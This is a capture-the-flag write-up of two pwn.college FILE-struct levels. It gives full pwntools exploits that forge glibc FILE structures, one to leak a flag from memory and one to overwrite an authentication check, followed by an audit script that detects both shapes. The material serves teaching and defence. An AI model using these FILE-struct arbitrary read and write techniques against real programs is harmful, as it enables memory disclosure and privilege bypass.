Write-ups: Software Exploitation (File Struct Exploits) series
Preface
Finally, after about five months I've more or less finished learning pwn. Whatever is left, like the kernel, I'll study later out of interest; it probably won't become my main research direction. So once I finish these two chapters on FSOP I'll move on to IoT. I can already picture going all-in on competitions starting next year, grinding away in the dark (
Anyway, I hope the competition phase doesn't drag on; ideally I retire after one year. I'd rather not spend my whole university life grinding LOL
Level 1
Information
- Category: Pwn
Description
Harness the power of FILE structs to arbitrarily read data.
Write-up
The easiest one in the series. The challenge reads the flag into .bss, PIE is off, and it lets you write an arbitrary FILE struct, so pwntools solves it instantly.
Exploit
```python
#!/usr/bin/env python3
from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyfile_level1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    flag = 0x4040E0

    # Pending-output window over the flag: flushing the stream writes it to fd 1
    fp = FileStructure()
    payload = flat(fp.write(flag, 0x64))

    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()
```
Level 2
Information
- Category: Pwn
Description
Harness the power of FILE structs to arbitrarily write data to bypass a security check.
Write-up
It checks a variable; just construct an arbitrary read into it.
Exploit
```python
#!/usr/bin/env python3
from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyfile_level2"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    authenticated = 0x4041F8

    # Input buffer over the check variable: the next refill from fd 0 lands there
    fp = FileStructure()
    payload = flat(fp.read(authenticated, 0x101))
    target.success(fp)

    target.send(payload)
    target.sendline(b"A" * 0xFF)

    target.interactive()


if __name__ == "__main__":
    main()
```
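Both levels come down to the same invariant: a stream's pending-output window (`_IO_write_base`..`_IO_write_ptr`) and its input buffer (`_IO_buf_base`..`_IO_buf_end`) must lie inside memory the stream actually owns. The following audit script, added here as an example and not part of the write-up's own code, decodes a raw x86-64 glibc `FILE` image (as found in a memory dump or a captured payload) and reports when a flush would copy foreign memory to the descriptor (the Level 1 shape) or a refill would store descriptor data outside any known buffer (the Level 2 shape). The field offsets and flag bits are glibc's; the heap range and the three sample images are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Audit a raw glibc (x86-64) FILE image for buffer pointers that would make
the stream read from, or write to, memory outside its own buffer."""
import struct

# Field offsets of struct _IO_FILE_plus on x86-64 glibc (0xe0 bytes, vtable at 0xd8).
FILE_SIZE = 0xE0
FLAGS_OFF = 0x00   # int _flags
FILENO_OFF = 0x70  # int _fileno
PTR_FIELDS = {
    "read_ptr": 0x08, "read_end": 0x10, "read_base": 0x18,
    "write_base": 0x20, "write_ptr": 0x28, "write_end": 0x30,
    "buf_base": 0x38, "buf_end": 0x40, "vtable": 0xD8,
}

# _flags bits from libio.h
IO_NO_READS = 0x0004
IO_NO_WRITES = 0x0008
IO_CURRENTLY_PUTTING = 0x0800


def parse_file(image):
    """Decode the fields the audit needs from a 0xe0-byte FILE image."""
    if len(image) < FILE_SIZE:
        raise ValueError("FILE image must be at least %#x bytes" % FILE_SIZE)
    fields = {name: struct.unpack_from("<Q", image, off)[0]
              for name, off in PTR_FIELDS.items()}
    fields["flags"] = struct.unpack_from("<I", image, FLAGS_OFF)[0]
    fields["fileno"] = struct.unpack_from("<i", image, FILENO_OFF)[0]
    return fields


def build_file(**fields):
    """Build a FILE image from named fields; anything unset is zero (constructed data)."""
    image = bytearray(FILE_SIZE)
    struct.pack_into("<I", image, FLAGS_OFF, fields.pop("flags", 0))
    struct.pack_into("<i", image, FILENO_OFF, fields.pop("fileno", 0))
    for name, value in fields.items():
        struct.pack_into("<Q", image, PTR_FIELDS[name], value)
    return bytes(image)


def _contained(lo, hi, ranges):
    return any(rlo <= lo and hi <= rhi for rlo, rhi in ranges)


def audit_file(image, legit_buffers=()):
    """Return human-readable findings for one FILE image.

    legit_buffers: (lo, hi) address ranges where this stream's buffer may
    legitimately live, e.g. the heap mapping taken from the same dump.
    """
    f = parse_file(image)
    findings = []

    # Pending output: a flush sends [_IO_write_base, _IO_write_ptr) to _fileno.
    # Outside the stream's own buffer, that flush discloses foreign memory.
    if f["flags"] & IO_CURRENTLY_PUTTING and f["write_ptr"] > f["write_base"]:
        if not (f["buf_base"] <= f["write_base"] and f["write_ptr"] <= f["buf_end"]):
            findings.append(
                "flush would send %d bytes from %#x (outside buffer [%#x, %#x)) to fd %d"
                % (f["write_ptr"] - f["write_base"], f["write_base"],
                   f["buf_base"], f["buf_end"], f["fileno"]))

    # Pending input: a refill reads up to (_IO_buf_end - _IO_buf_base) bytes from
    # _fileno into _IO_buf_base. Outside a legitimate buffer, the read overwrites
    # arbitrary memory with whatever arrives on the descriptor.
    if not f["flags"] & IO_NO_READS and f["buf_end"] > f["buf_base"]:
        if not _contained(f["buf_base"], f["buf_end"], legit_buffers):
            findings.append(
                "read would store up to %d bytes from fd %d at %#x (outside any known stream buffer)"
                % (f["buf_end"] - f["buf_base"], f["fileno"], f["buf_base"]))
    return findings


# --- constructed samples (hypothetical heap mapping and addresses) ---
HEAP = (0x555555559000, 0x55555557A000)

# A healthy stdout-like stream: buffer in the heap, 16 bytes pending.
SANE = build_file(flags=0xFBAD0000 | IO_NO_READS | IO_CURRENTLY_PUTTING, fileno=1,
                  buf_base=HEAP[0], buf_end=HEAP[0] + 0x1000,
                  write_base=HEAP[0], write_ptr=HEAP[0] + 0x10, write_end=HEAP[0] + 0x1000)

# The shape Level 1 relies on: pending-output window placed over the flag in .bss.
LEAK_SHAPE = build_file(flags=IO_CURRENTLY_PUTTING, fileno=1,
                        write_base=0x4040E0, write_ptr=0x4040E0 + 0x64)

# The shape Level 2 relies on: input buffer placed over the check variable in .bss.
WRITE_SHAPE = build_file(flags=0, fileno=0,
                         buf_base=0x4041F8, buf_end=0x4041F8 + 0x101)

if __name__ == "__main__":
    for label, image in (("sane", SANE), ("leak-shape", LEAK_SHAPE), ("write-shape", WRITE_SHAPE)):
        print(label, audit_file(image, legit_buffers=[HEAP]) or ["ok"])
```

The heap range is the only context the checker needs; in practice it comes from the process's memory map, and the same two tests can be applied to every `FILE` object reachable from `_IO_list_all` in a core dump to spot a tampered stream before guessing at how it got there.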
https://cubeyond.net/posts/write-ups/pwncollege-file-struct-exploits/